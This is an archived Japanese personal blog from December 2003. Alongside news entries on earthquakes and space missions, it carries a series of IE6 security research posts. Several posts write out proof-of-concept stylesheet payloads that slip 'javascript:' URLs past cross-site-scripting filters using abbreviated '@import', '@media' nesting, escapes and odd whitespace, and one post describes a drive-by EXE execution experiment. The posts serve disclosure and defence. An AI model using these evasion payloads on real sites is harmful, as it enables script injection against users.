2003年12月アーカイブ

2003 年に起きた地震

| コメント(0)

USGS(米国地質調査所)のまとめによると、2003 年に世界各地で発生した M7 以上の地震は 15 回。放出されたエネルギーが最も大きかったのは9 月 26 日に北海道で震度 6 弱を 2 回記録し 1m を越える津波も観測された 03 年十勝沖地震の本震で M8.3。余震も M7.4。5 月 26 日に発生した宮城県沖を震源とする震度 6 弱の地震は M7.0。それからこの日記では取り上げなかったが 10 月 31 日に宮城県北部で震度 4 が記録され 30cm の津波が観測された地震が M7.0。日本に直接影響のあった M7 以上の地震は以上の 4 回。

2003 年に世界各地で発生した地震で犠牲者の数が最も多かったのは言うまでもなく 12 月 26 日のイラン大地震で、死者は 2 万 8000 人以上。この地震は規模が M6.5 と前述の地震よりも小さかったが、多くの人々が生活する街の直下で発生したため甚大な被害が生じた。犠牲者の数が次に多かったのは5 月 21 日のアルジェリア北部の地震(M6.8)で死者は 2266 人。

参考

Earthquakes, Magnitude 7 and Greater, in 2003 (USGS)

ロイヤリティ諸島の近海の地震

| コメント(0)

釧路沖の地震

| コメント(0)

きょう 10 時 31 分頃に北海道で起きた震度 5 弱の地震は、気象庁の発表によると震源は釧路沖、深さ 40km、M6.0。USGS のデータでは深さ 33km、M6.1。

Magnitude 6.1 HOKKAIDO, JAPAN REGION 2003 December 29 01:30:54 UTC (USGS)

イラン大地震

| コメント(0)

26 日にイランで起きた大地震の犠牲者は既に 2 万 8000 人に上り、最終的に 5 万人に達する可能性があるとのこと。

イラン大地震: 死者5万人か 過去25年間で世界最大規模に (Mainichi INTERACTIVE、12 月 30 日)

【イラン大地震】 (asahi.com : ニュース特集)

Beagle 2

| コメント(0)

火星着陸船 Beagle 2 の着陸目標地点に直径 1km ほどのクレーターが発見され、運悪くクレーター内に降りてしまったことが通信ができない理由ではないかと考えられているそうです。

Beagle 2 …Beagle 2 公式サイト

Mission Status Center (Spaceflight Now)→@nifty 翻訳 … 最新情報

Scientists find obstacle at heart of Beagle landing zone (Spaceflight Now、12 月 29 日)→@nifty 翻訳

Crater theory over missing Beagle (CNN.com Space、12 月 29 日)→@nifty 翻訳

HTML ソースを隠すことについて

| コメント(0)

hoshikuzu さん から。「わざわざ HTML ソースを隠すことに賛成しない」に同感です。HTML ソースを隠す方法と言われているものはいろいろありますが、一部の環境で HTML ソースを参照するのにかかる手間を少し増やす程度の効果しか得られないものばかりです。無理に効果を得ようとして閲覧できる環境を制限したのでは、何のためにホームページを公開したのかわからなくなってしまいます。ホームページを開設したならば、より多くの人に見てもらいたいものです。ホームページの趣旨と関係のないところで訪れる人が減ってしまうのはもったいないです。

メモ

mht ファイルは view-source プロトコルで直接参照できます。ProtWare のデモページの解読も見た目ほど手間はかかりません。技術的なことよりも法律的なことのほうが問題になるかも知れないので詳細は控えます。

放送事故

| コメント(0)

フジテレビで放送事故が発生。

18 時 35 分頃復旧。

原因は機械故障とのこと。

ループの上限について

| コメント(0)

hoshikuzu さん から。きのうのスクリプトのループの上限についてですが、条件に該当する文字が他に存在しないことを確認するためには、255 までではなくて 65535 まで回す必要があると思います。実際、「空白とみなされる文字」は 256 番以降にも存在しますし。

英語の話

| コメント(0)

hoshikuzu さん から。canner は缶詰を作る人、癌は cancer ですね。蟹座は Cancer。癌を cancer と呼ぶようになったのは乳癌の腫瘍とその周辺の様子が足を広げた蟹の姿に似ていたためだそうですが、英語では cancer が蟹の意味で使われることは少ないようです。カニ料理のカニは crab。カニ蒲は imitation crab と呼ばれて欧米でも人気があるようですが、美味しいカニ蒲もイミテーションなどと言われるといかにも模造品という感じで美味しそうに思えないのは日本人だからでしょうか。蒲鉾は kamaboko でも通じるようですが、加工の仕方によって steamed だったり boiled だったり fried だったりしてややこしいので、蒲鉾の仲間全般を指すときは surimi-based products などと呼ぶようです。surimi の語源は言うまでもなく日本語の「すり身」です。sushi や tempura のように直接口に入る食品ではない中間素材について日本語の名称が海外で使われているというのはちょっと不思議な感じがしますが、それだけ魚のすり身の加工技術が日本人の発明によるところが大きいということなのでしょう。

surimi を The American Heritage Dictionary of the English Language で検索

surimi (Bartleby.com)

surimi を Food and Wine Dictionary で検索

surimi (International Recipes OnLine)→@nifty 翻訳

surimi を FDA(米国食品医薬品局)のサイトで検索

FDA Website Search Results (FDA)

蒲鉾についていろいろ書いてあるサイト

全国かまぼこ連合会

かまぼこの歴史

かまぼこの製造方法

かまぼこ製品図鑑

KA・MA・BO・KO

カマピー&チックル

イラン大地震関連

| コメント(0)

現地時間の 26 日午前 5 時 26 分頃(日本時間の 26 日午前 10 時 56 分頃)、イラン南東部で大きな地震があり、死者は 2 万人以上、負傷者は 5 万人と伝えられています。震源は Kerman の南東 185km(北緯 28.990 度、東経 58.288 度)、深さ 10km、規模は M6.5。1 時間 10 分後に M5.4 の余震と思われる地震が起きています。

USGS(米国地質調査所)

Magnitude 6.5 - SOUTHEASTERN IRAN 2003 December 26 01:56:52 UTC

Magnitude 5.4 SOUTHEASTERN IRAN 2003 December 26 03:06:13 UTC

ReliefWeb

Iran - Earthquake OCHA Situation Report No. 2 (12 月 26 日)→@nifty 翻訳

Iran: At least 20,000 killed as huge quake devastates historic city (12 月 26 日)→@nifty 翻訳

International Federation of Red Cross and Red Crescent Societies(国際赤十字社・赤新月社)

Thousands feared killed as earthquake hits southeast Iran (12 月 26 日)→@nifty 翻訳

CNN.com

Thousands feared dead after earthquake in Iran (12 月 26 日)→@nifty 翻訳

The New York Times

Deadly Earthquake Jolts City in Southeast Iran (12 月 26 日)→@nifty 翻訳

Mainichi INTERACTIVE

イラン地震: 死者は数千人に 3万人以上が負傷 (12 月 27 日)

イラン地震: 支援用意の声明 米大統領 (12 月 27 日)

イラン地震: 死者2万人超、負傷者も5万人 救助活動難航 (12 月 27 日)

asahi.com

イラン大地震 (asahi.com ニュース特集)

首相「できる限りの支援を」とメッセージ イラン地震 (12 月 27 日)

毛布にくるまり泣く子供たち、中世の町が無残に イラン (12 月 27 日)

イラン地震で国連や欧州各国から支援の手 (12 月 27 日)

イラン南東部で強い地震、死者5、6000人か (12 月 27 日)

イラン地震で米が人道支援を発表 (12 月 27 日)

政府やNPOの緊急援助隊、被災地へ出発 イラン地震 (12 月 27 日)

イラン地震、死者2万人超の可能性も 氷点下、肉親捜索 (12 月 27 日)

ユネスコ、文化遺産調査団を派遣へ イラン地震 (12 月 27 日)

素因数分解

| コメント(0)

数列 (7·10n-43)/9 = { 3, 73, 773, 7773, 77773, ... } の素因数分解表を n≤150 まで伸ばしました。未分解の数が 17 個残っています。

Factorizations of near-repdigit numbers

この数列の 4494 番目の数(4494 桁)はおそらく素数です。

A canner ...

| コメント(0)

hoshikuzu さん から。この前の英文は昔聞いたものでうろ覚えなのですが、こんな感じだったと思います。

A canner can can anything he can can. But he can't can a can, can he?

缶詰工は缶詰にできるものなら何でも缶詰にすることができます。でも缶詰を缶詰にすることはできませんね。

canは助動詞の「~できる」、canは動詞の「缶詰にする」、can は名詞の「缶詰」、最後のcan he? は付加疑問。

わりとどうでもいいスクリプト

| コメント(0)

IE6 のスタイルシートの挙動を確認する作業を支援するために適当に書いたスクリプトです。@media に混ざっていても無視される文字やコロンの代わりに使える文字を探したときに使ったもので、ほとんど用済みですが、せっかく作ったので貼り付けておきます。「一部の文字が異なるスタイルシートを大量に生成して期待通りに動作するものを探す」という面倒な作業を機械的に行うことができて、main() を書き換えてリロードすることでいろいろなパターンをテストできます(大量のエラーが発生するのでエラーを通知しない設定にしておいたほうがよいです)。

-
<html>
<head>
</head>
<body>
<script>
<!--

//1つのドキュメントに割り当てられるスタイルシートの最大数
var STYLESHEETS_PER_DOCUMENT = 31;
//1つのスタイルシートに割り当てられるインポートの最大数
var IMPORTS_PER_STYLESHEET = 31;

//最後のスタイルシートの番号
var lastStyleSheetNumber = -1;
//最後のスタイルシートの最後のインポートの番号
var lastImportNumber = IMPORTS_PER_STYLESHEET - 1;

//スタイルシートのアドレスを追加する
function addStyleSheetAddress(address) {
  //最後のインポートの番号を更新する
  if (lastImportNumber >= IMPORTS_PER_STYLESHEET - 1) {
    //最後のスタイルシートの番号を更新する
    if (lastStyleSheetNumber >= STYLESHEETS_PER_DOCUMENT - 1) {
      //スタイルシートが多すぎる
      return;
    }
    document.createStyleSheet();
    lastStyleSheetNumber++;
    lastImportNumber = -1;
  }
  lastImportNumber++;
  //スタイルシートのアドレスを追加する
  try {
    document.styleSheets(lastStyleSheetNumber).addImport(address);
  } catch (e) {
  }
}

//javascriptで1回評価すると指定された文字列になる文字列を返す
function javascriptEncode(s) {
  return '"' + s.replace(/\\/g, '\\\\').replace(/"/g, '\\"') + '"';
}

//文字列をjavascriptプロトコルのアドレスに変換する
function javascriptProtocolEncode(s) {
  return 'javascript:' + escape(javascriptEncode(s));
}

//スタイルシートのデータを追加する
function addStyleSheetData(data) {
  if (data) {
    addStyleSheetAddress(javascriptProtocolEncode(data));
  }
}

//テストルーチンの本体
//  data1とdata2をスタイルシートのデータとみなして交互に追加してゆく
//  (1) n > endならば終了する
//  (2) data1をスタイルシートのデータとみなして追加する
//  (3) 10ms待つ
//  (4) data2をスタイルシートのデータとみなして追加する
//    このとき以下の変換を行う
//    $c → 文字コードnの文字
//    $d → nの値(10進数)
//    $h → nの値(16進数)
//  (5) 10ms待つ
//  (6) nを1増やす
//  (7) (1)に戻る
function testStyleSheets(data1, data2, n, end) {
  if (n > end) {
    return;
  }
  window.status = n;
  addStyleSheetData(data1);
  setTimeout('testStyleSheets2(' +
    javascriptEncode(data1) + ', ' +
    javascriptEncode(data2) + ', ' + n + ', ' + end + ')', 10);
}
function testStyleSheets2(data1, data2, n, end) {
  var data = data2.replace(/\$./g,
    function (s) {
      var c = s.substr(1);
      switch (c) {
      case 'c':
        return String.fromCharCode(n);
      case 'd':
        return n.toString(10);
      case 'h':
        return n.toString(16);
      }
      return c;
    });
//  putsln(n + ' ' + data);
  addStyleSheetData(data);
  setTimeout('testStyleSheets(' +
    javascriptEncode(data1) + ', ' +
    javascriptEncode(data2) + ', ' + (n + 1) + ', ' + end + ')', 10);
}

//textareaを探す
function getTextarea(n) {
  return document.getElementsByTagName('textarea')(n);
}

//textareaに1行出力する
function putsln(s) {
  getTextarea(0).value += s + '\n';
}

//自動実行エントリ
document.body.onload = function () {
  getTextarea(0).value = '';
  main();
}


//以下を変更してテストする


//属性名と設定値の区切りに使える文字を探す
function main() {
  testStyleSheets(
    'body { color: black }',
    'body { color$c red; background: url(javascript:logger($d)) }',
    0x00, 0x7f);
}
function logger(n) {
  if (document.body.currentStyle.color == 'red') {
    putsln(n.toString(16) + ' ' + String.fromCharCode(n));
  }
}


// -->
</script>
<textarea cols="120" rows="40"></textarea>
</body>
</html>

Beagle 2

| コメント(0)

ESA の Mars Express から投下された火星着陸船 Beagle 2 ですが、予定時刻を過ぎても着陸成功を知らせる最初の信号が届かず、関係者をやきもきさせています。

Beagle 2 …Beagle 2 公式サイト

Mission Status Center (Spaceflight Now)→@nifty 翻訳 … 最新情報

Life on Mars? A Beagle may find it (CNN.com Space、12 月 25 日)

アリスソフト アーカイブズ

| コメント(0)

RetroPC.NET さんにて、アリスソフトの「配布フリー宣言」の対象となったソフトウェアを公開する「アリスソフト アーカイブズ」というページが新設されました。

アリスソフト アーカイブズ (retropc.net)

「アリスソフト アーカイブズ」はアクセス制限にリファラを使用しているため、Norton Internet Security(以下、NIS)などで万全のセキュリティ対策を行っているとコンテンツにアクセスできない場合があります。NIS の場合の暫定的な対策として、サーバ単位でリファラの使用を許可する方法が書かれているページを紹介しておきます。

NIS 2004 の場合

参照元 (リファラ) が遮断され、Web サイトが正しく表示されない (シマンテック)

NIS 2003 の場合

参照元 (リファラ) が遮断され、Web サイトが正しく表示されない (シマンテック)

NIS 2001/2002 の場合

参照元 (リファラ) が遮断され、Web サイトが正しく表示されない (シマンテック)

「:active」などの省略形

| コメント(0)

スタイルシートのキーワードの省略形の続き。「:active」→「:a」、「:hover」→「:h」、「:link」→「:l」、「:visited」→「:v」、「:first-letter」→「:f」、「:first-line」→「:first-li」。いずれも最短の場合で、これより長くても可。

HTML ファイル

-<html>
<head>
<style>
<!--
a:a, a:h, a:l, a:v {
text-decoration: none;
}
p {
font-size: 200%;
}
p:f {
font-size: 200%;
}
p:first-li {
text-transform: uppercase;
}
-->
</style>
</head>
<body>
<p>A canner can can anything he can can.<br>But he can't can a can, can he?</p>
<textarea id="t" cols="80" rows="25"></textarea>
<script>
<!--
document.body.onload = function () {
t.value = document.styleSheets(0).cssText;
}
// -->
</script>
</body>
</html>

実験

上記の HTML ファイルを表示してみる

スタイルシートでは属性名と設定値をコロン「:」で区切ることになっていますが、IE6 ではコロンの代わりにイコール「=」で区切ることができます。コロンまたはイコールの手前には、「:」「=」「;」「</style>」または閉じていない「"~"」「'~'」を除く文字ならば英数字も含めて何を書いても無視されます。閉じている「"~"」「'~'」の内側では「</style>」以外のすべての文字が無視されます。

HTML ファイル

-<style>
*body {
{ __background-image ': url(fake.jpg);' = url\("javascript:alert(document.styleSheets(0).cssText)")
}
</style>

ダイアログの表示(Windows XP + IE6 SP1)

- BODY {
BACKGROUND-IMAGE: url(javascript:alert(document.styleSheets(0).cssText))
}

実験

上記の HTML ファイルを表示してみる

カリフォルニアの地震関連

| コメント(0)

現地時間 22 日午前 11 時 15 分頃(日本時間 23 日午前 4 時 15 分頃)、米カリフォルニア州中部で強い地震があり、パソ・ロブレスで街のシンボルだった 1892 年に建てられた時計台のある建物が崩壊し、巻き込まれた市民 2 人が死亡。地震の規模は M6.5、震源の深さは 7.6km(4.7miles)。

Magnitude 6.5 - CENTRAL CALIFORNIA 2003 December 22 19:15:56 UTC (USGS)

Earthquake collapses historic building, killing 2 (CNN.com US、12 月 22 日)→@nifty 翻訳

地震: 米加州でM6.5 建物崩壊2人死亡 (Mainichi INTERACTIVE、12 月 23 日)

カリフォルニアでM6.5の地震、2人死亡、1人不明 (asahi.com 国際、12 月 23 日)

関連

Welcome to Paso Robles Downtown … パソ・ロブレスの時計台の大きい写真ほか

「url」の省略形

| コメント(0)

IE6 のスタイルシートでは「@import url("~");」の「url」も(3 文字しかないのに)末尾を省略できたりします。hoshikuzu さん の「@ の次に直接、null コードに相当するスタイルシートエンコーディングをつけると、続く import の文字がなくても、import と解する」も取り入れつつ、実験。素因数分解も、是非。

HTML ファイル

-<style>
@\
u
("javascript:alert(document.styleSheets(0).cssText)");
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText) );

実験

上記の HTML ファイルを表示してみる

@media に注意(その 4)

| コメント(0)

@media に注意(その 2)の応用です。IE6 のスタイルシートでは @media の「{」の直前に何を書いても無視されてしまいますが、「英数字さえも無視されてしまう」という点で @import よりも危険です。下の例は style 要素の終了タグが欠落しており、Opera 7.23 などでは「style 要素の終了タグが見つからないときは開始タグがなかったことにする」ので body 要素の内容が表示されますが、IE6 は「style 要素の終了タグが見つからないと最後までスタイルシートだと思い込む」ために body 要素に書いたスクリプトが実行されてしまいます。

HTML ファイル

-<html>
<head>
<style>
<!--
@m;
-->
</head>
<body>
{ @i:"javascript:alert(1)"; }
</body>
</html>

実験

上記の HTML ファイルを表示してみる

@media に注意(その 3)

| コメント(0)

IE6 のスタイルシートの @media は多重化できます。下の例では「@media には省略形がある」「@media と「{」の間には何を書いても無視される」「「url(~)」の「url」と「(」は繋がっていなくてもよい」などのトリックも使っています。

HTML ファイル

-<style>
@m " 冬 ";
.L1 {
@m " 至 ";
.L2 {
@me " に ";
.L3 {
@me " カ ";
.L4 {
@med " ボ ";
.L5 {
@med " チ ";
.L6 {
@medi " ャ ";
.L7 {
@medi "。";
.L8 {
@i: url    ("javascript:alert(document.styleSheets(0).cssText)");
}
}
}
}
}
}
}
}
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText) );

実験

上記の HTML ファイルを表示してみる

@media に注意(その 2)

| コメント(0)

IE6 のスタイルシートでは @media の「{」の直前に「{」「</style>」または閉じていない「"~"」「'~'」以外の何を書いても無視されてしまいます(@import の場合と同様にエンプティエンドタグ「</>」も無視されます)。下の例にある {~} は @media に対応するものであって、body 要素に対応するものではありません。

HTML ファイル

-<style>
@media all;
@charset "shift_jis";
@import url(fake.css);
body {
@\import: "\22javascript:alert(document.styleSheets(0).cssText)\22";
}
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText) );

実験

上記の HTML ファイルを表示してみる

@media に注意

| コメント(0)

IE6 ではスタイルシートの @media の {~} の内側に書かれた @import が機能します。@import の直後にコロンを書くことができるので、@media を認識しないフィルタは「@media { @import: "~"; }」を「@media 要素の @import 属性にアドレスではない単なる文字列を設定している」と誤認してスクリプトを見逃してしまうかも知れません。下の例はこれまでに書いた「\0[空白] が消滅する」や「@import のアドレスは url(~) の内側と外側の 2 回 "~" で囲むことができる」などのトリックも組み合わせてあります。「"\22」の部分を「""」と同等に扱ってしまうフィルタはさらに混乱するかも知れません。

HTML ファイル

-<style>
@\0
m {
@\0
i: "\22
j\0
avascript: alert(document.styleSheets(0).cssText)\22";
}
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript: alert(document.styleSheets(0).cssText) );

実験

上記の HTML ファイルを表示してみる

冬至に寒くなる話

| コメント(0)

かつてヘンリー 8 世の居城だったロンドン郊外のテムズ川沿いにあるハンプトン・コート宮殿(Hampton Court Palace)で、誰もいないはずの展示室から不気味な人影が出てくるところを監視カメラが捉え、「幽霊ではないか?」と話題になっているらしい。

'Ghost' caught on CCTV (femail.co.uk、12 月 19 日)→@nifty 翻訳

http://www.femail.co.uk/img/pix3/hamptonghostL191203_450x350.jpg … 幽霊?の姿が写っている大きめの写真

英宮殿に「幽霊?」説、監視カメラが姿とらえる (CNN.co.jp こぼれ話、12 月 21 日)

Palace 'ghost' caught on camera (CNN.com World、12 月 19 日)→@nifty 翻訳

Is this ghost of Henry VIII? (The Sun Newspaper Online、12 月 19 日)→@nifty 翻訳 … 詳しい

Palace 'ghost' caught on camera (CBBC Newsround UK、12 月 19 日)→@nifty 翻訳 … 子供向け

Hampton Court 'ghost' on film (Telegraph、12 月 20 日)→@nifty 翻訳 … 写真の明るさが調整されていて周囲の様子がわかりやすい

IE6 は <base> 要素で javascript プロトコルを設定できます。これは <a> 要素やスタイルシートの @import のアドレスの指定で「javascript:」を省略してスクリプトを記述できることを意味しています。<base> 要素にスクリプトを記述しただけではスクリプトは実行されませんが、クロスサイトスクリプトをブロックするためには <base> 要素で指定されたプロトコルもチェックする必要があります。

HTML ファイル

-<html>
<head>
<base href="javascript:">
<style>
@import alert(document.styleSheets(0).imports(0).href);
</style>
</head>
<body>
<a href="alert%28location.href%29">location.href</a>
</body>
</html>

実験

上記の HTML ファイルを表示してみる

スピッツァー宇宙望遠鏡関連

| コメント(0)

赤外線宇宙望遠鏡「スピッツァー」による初画像 (アストロアーツ 天文ニュース、12 月 20 日)

2004 年問題

| コメント(0)

UNIX 系のプログラムの多くが 1970 年 1 月 1 日午前 0 時 0 分 0 秒からの経過秒数を 32 ビット符号付き整数で処理しているために 1970 年から 68 年後の 2038 年に経過秒数がオーバーフローしてプログラムが正常に機能しなくなってしまうというのが2038 年問題ですが、なぜか 1 ビット足りなくて 1970 年から 34 年後の 2004 年 1 月 10 日に日付の管理が破綻してしまうシステムが発見されたのだとか。ZDNet によると製品ライフサイクル管理アプリケーション専門メーカーの PTC のほとんどの製品が影響を受け、一部の製品についてパッチの配布が始まっているそうです。整数が 1 ビット足りないなんて、なんだか昔の LISP みたいですね。

2000 年問題に似た不具合、PTC 製ソフトに発見 (ZDNet News、12 月 20 日)

PTC - What Matters Most? Product First

メモ

| コメント(0)

店舗移転

Zetwork-Projects さんより、若松通商の PS/PLAZA WAKAMATSU が店舗を移転するとの情報。

お買い得価格情報 (2003 年 12 月 19 日) (impress AKIBA PC Hotline)

若松通商へようこそ

サイト移転

きたきたネット in Internet! (HashiM さん)

属性名の途中に空白を混ぜる

| コメント(0)

IE6 ではスタイルシートの属性名の途中に「\[空白]」または「\0[空白]」を混ぜると「\」から空白までが消滅して何も混ぜなかった場合と同じことになります。「@import」の続きに書いたように IE6 では「\a0」(nbsp)や「\3000」(全角スペース)も空白と見なされるので、属性名の途中に nbsp や全角スペースを混ぜることができます。

HTML ファイル

-<style>
body { b\0 eh\0 avior: '\75\72\6c(blink.htc)'; }
</style>

blink.htc(背景を明滅させます)

-<script>
level = 0;
setInterval(function () {
this.style.backgroundColor =
'#' +(0x1000000 + (level < 128 ? level : 255 - level)).toString(16).substr(1);
level = (level + 4) & 255;
}, 50);
</script>

実験

上記の HTML ファイルを表示してみる

(明滅する背景を長時間見つめないでください)

「&lt;!--」の扱い

| コメント(0)

12/24 この項目は削除されました。

きのう書いたスタイルシートの区切り文字の 2 番目の実験の意味するところを hoshikuzu さんが詳細に解説してくださっています。ありがとうございます。2 番目の実験は「IE6 はエンプティエンドタグさえも単なる区切り文字として読み飛ばしてしまう」という深刻な問題を示しています。hoshikuzu さんによる解説を参照してください。

想像以上に破壊力があった IE の不思議な挙動 (hoshikuzu|stardust の書斎)(hoshikuzu さん)

「@import」の続き

| コメント(0)

IE6 はスタイルシートで「@import url(~);」の「url(~)」の外側を「"~"」または「'~'」で括ってもインポートします。また、IE6 は「\0\9\a\b\c\d\20」の他に「\a0\2000\2001\2002\2003\2004\2005\2006\2007\2008\2009\200a\200b\3000\feff」なども空白とみなします。例えば「\3000」は全角スペースそのものなので、「@import」の「@」の直前に全角スペースがあってもインポートが行われるほか、「url(~)」とアドレスの間などを全角スペースで区切ってもインポートが行われることになります。

HTML ファイル

-<style>
@Im'
\0\9\a\b\c\d\20\a0\2000\2001\2002\2003\2004\2005\2006\2007\2008\2009\200a\200b\3000\feff
url(
\0\9\a\b\c\d\20\a0\2000\2001\2002\2003\2004\2005\2006\2007\2008\2009\200a\200b\3000\feff
\'
\0\9\a\b\c\d\20\a0\2000\2001\2002\2003\2004\2005\2006\2007\2008\2009\200a\200b\3000\feff
javascript:alert(document.styleSheets(0).cssText);
\'
\0\9\a\b\c\d\20\a0\2000\2001\2002\2003\2004\2005\2006\2007\2008\2009\200a\200b\3000\feff
)
\0\9\a\b\c\d\20\a0\2000\2001\2002\2003\2004\2005\2006\2007\2008\2009\200a\200b\3000\feff
';
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText);
);

実験

上記の HTML ファイルを表示してみる

スピッツァー宇宙望遠鏡

| コメント(0)

NASA のスピッツァー宇宙望遠鏡(SIRTF)が捉えた最初の画像がきのうリリースされました。1990 年に打ち上げられ 1993 年と 1997 年の改修を経て活躍を続けているハッブル宇宙望遠鏡(HST)(紫外線、可視光線、近赤外線)、1991 年に打ち上げられ 2000 年に使命を終えたコンプトン・ガンマ線天文台衛星、1999 年に打ち上げられた X 線観測衛星チャンドラに続き、2003 年 8 月 25 日に打ち上げられたスピッツァー宇宙望遠鏡(SIRTF)は赤外線の波長をカバーします。NASA の Great Observatories 計画の最後の衛星となるスピッツァー宇宙望遠鏡が稼動したことで、大気に遮られて地表まではほとんど届かない遠い天体が発するかすかな赤外線(遠い天体は遠ざかっているので、その光の波長は赤方偏移によって赤外線の波長に偏っている)を観測することが可能になり、今後の観測成果が期待されています。

Spitzer Space Telescope (カリフォルニア工科大学)

About Spitzer@nifty 翻訳

About Spitzer: Great Observatories@nifty 翻訳

Press Release: NASA Releases Dazzling Images from New Space Telescope (12 月 18 日)→@nifty 翻訳 … プレスリリース

Visuals: NASA Releases Dazzling Images from New Space Telescope (12 月 18 日)→@nifty 翻訳 … 画像

First images from Spitzer Space Telescope unveiled (Spaceflight Now、12 月 18 日)→@nifty 翻訳

CNN.com - New orbiter takes out-of-sight pictures - Dec. 18, 2003 (CNN.com Space、12 月 18 日)→@nifty 翻訳

スタイルシートの区切り文字

| コメント(0)

IE の不思議な挙動 (hoshikuzu さん)より。IE6 はスタイルシートの「@import url("~");」の構文において「import」と「url」の間の区切りが空白である必要はなく、キーワードに使用される英数字を除くありとあらゆる記号や制御コードの並びが区切りとして認識されてしまいます。特にセミコロンが「import」と「url」の間の区切りとして処理されてしまうことから、クロスサイトスクリプトをブロックするためのフィルタを作る人にとって大変都合の悪い実装であると言えます。なお、ハイフンとアンダーラインは前の「import」(またはその省略形)にくっついているとキーワードの一部と認識されるので区切り文字になりません。

HTML ファイル

-<style>
@i ???(...);
url("javascript:alert(document.styleSheets(0).cssText)");
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText) );

実験

上記の HTML ファイルを表示してみる

HTML ファイル

-<style>
<!--
@i ???(...);
-->
</>
url("javascript:alert(document.styleSheets(0).cssText)");

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText) );

実験

上記の HTML ファイルを表示してみる

追記 (12/19)

2 番目の実験は「IE6 はエンプティエンドタグさえも単なる区切り文字として読み飛ばしてしまう」という深刻な問題を示しています。hoshikuzu さんによる解説を参照してください。

想像以上に破壊力があった IE の不思議な挙動 (hoshikuzu|stardust の書斎)(hoshikuzu さん)

侵入実験

| コメント(0)

参考

ネットワーク・セキュリティ・ニュース (篠田さん)

Re: Several Things about IE bugs (Bugtraq)

実験の内容

11 月 29 日の日記に書いた、放置されたままになっている IE6 のセキュリティホールを使い、PC にプログラム(EXE ファイル)をダウンロードおよび実行させることを試みます。

プログラムは「ietest22.exe」というタイトルで「侵入成功」と書かれた小さなダイアログを表示するだけの簡単なものです。

この実験で「侵入成功」のダイアログが表示されなくても侵入されない保証にはなりません。

動作環境

以下の環境で動作することを確認しました。

Windows XP Home Edition SP1 + IE6 SP1(MS03-051 までの「重要な更新」をすべて適用済み)

Windows 98 では動作しません。

動作条件

以下の条件が満たされているとマイコンピュータゾーンに侵入します。

(1) インターネットゾーンの「アクティブスクリプト」が有効になっている。

かつ、

(2) インターネットゾーンの「異なるドメイン間のサブフレームの移動」が有効になっている。

さらに以下の条件も満たされているとプログラムの実行に至ります。

(3) マイコンピュータゾーンの「未署名の ActiveX コントロールのダウンロード」が有効になっている。

なお、インターネットオプションの詳細設定で「スクリプトエラーごとに通知を表示する」にチェックが入っていると途中でエラーが数回表示されます。

対策

上記の動作条件の (1)~(2) が満たされないようにする必要があります。

(0) IE を使わない。

または、最新の修正プログラムを適用した上で、

(1) インターネットゾーンのセキュリティレベルを「高」にする、または、インターネットゾーンの「アクティブスクリプト」を無効にする。

または、

(2) インターネットゾーンの「異なるドメイン間のサブフレームの移動」を無効にする。

注意

「侵入成功」のダイアログが表示されるまでに 30 秒以上かかることがあります。

「侵入成功」のダイアログが表示されたときは、親ウインドウ→子ウインドウ→ダイアログの順にクローズしてください。ダイアログを先に閉じると IE が固まってしまうことがあります。

プログラムの実行に成功したとき、IEXPLORE.EXE の残骸が残ってしまうことがあります。タスクマネージャで残骸の確認と削除を行ってください。

プログラムの実行に成功したとき、オブジェクトの残骸が残ってしまうことがあります。インターネットオプションの「インターネット一時ファイル」→「設定」→「オブジェクトの表示」で残骸の確認と削除を行ってください。プログラムファイルの項目が「11111111-1111-1111-1111-11~」で始まっているもの(下位 10 桁は乱数)が残骸です。右クリック→「削除」で削除できます。間違って関係のないものを削除しないように注意してください。

実験

危険な実験です。上記の説明をすべて理解できた人でなければ実験を行わないほうがよいでしょう。

実験を行う

2004 年 2 月 3 日追記

MS04-004で修正されました。

IE6 のスタイルシートで「@i」が「@import」の省略形として処理されていることは、スタイルシートオブジェクトを参照することで確認できます。

HTML ファイル

-<style>
@i javascript:alert(document.styleSheets(0).cssText);
</style>

ダイアログの表示(Windows XP + IE6 SP1)

-@import url( javascript:alert(document.styleSheets(0).cssText) );

この結果から、「@i」は「@import」に変換され、続く文字列は「url(~)」や「"~"」を省略してもアドレスとして認識されることがわかります。ダイアログが表示されたことで、アドレスのところに記述したスクリプトが実行されたことの確認にもなっています。

実験

上記の HTML ファイルを表示してみる

hoshikuzu さん より、IE6 のスタイルシートでは「@import の後ろ側の数文字が欠落しても、インポートしてしまう」ほか。スタイルシートの設定を認めている各種サービスにおいて、クロスサイトスクリプトをブロックするために「@import」を検出していてもその省略形を検出していなければスクリプトが通ってしまう可能性があります。

IE の新セキュリティーホールとはてなダイアリー XSS 対策 (hoshikuzu|stardust の書斎、12 月 15 日)

ちょっと試しただけでも、「@font-face」→「@f」、「@media」→「@m」、「!important」→「!i」などが使えました。他にもいろいろありそうですね。「\x00 以降の文字列がステータスバーに表示されない」などと同様に、これらの省略形が「意図された実装」によるものなのかそれとも「ルーズな実装」の結果なのかはよくわかりません。

-<style type="text/css">
<!--
@f {
font-family: pie0;
src: url(http://www.microsoft.com/typography/web/embedding/demos/1/PIE0.eot);
}
@m screen {
span {
color: red!i;
font-family: pie0;
font-size: 400%;
}
}
-->
</style>
<span style="color:green">zzz</span>

履歴を使う方法

| コメント(0)

IE6 の危険な不具合」を悪用したアドレスバーの偽装を見破るために IE の履歴を使うという方法が Microsoft のサポート情報で紹介されていました。IE6 で確認したところ使えそうなので書いておきます。

アドレスバーの偽装の有無を確認したいページが表示されている状態で、ツールバーの履歴ボタンをクリック(履歴ボタンが表示されていないときは「表示」→「エクスプローラバー」→「履歴」を選択)して、訪れたサイトの履歴を表示します。そこで履歴の表示方法を「日付順」または「サイト順」のいずれか現在選択されていないほうに切り替えると、現在表示されているページが選択状態になってその上の階層にサーバ名が表示されます(画面外にあるときはスクロールバーで履歴をスクロールさせると見つかります)。履歴に表示されたサーバ名とアドレスバーに表示されているサーバ名を比較することで、アドレスバーの偽装を見破ることができます。

参考

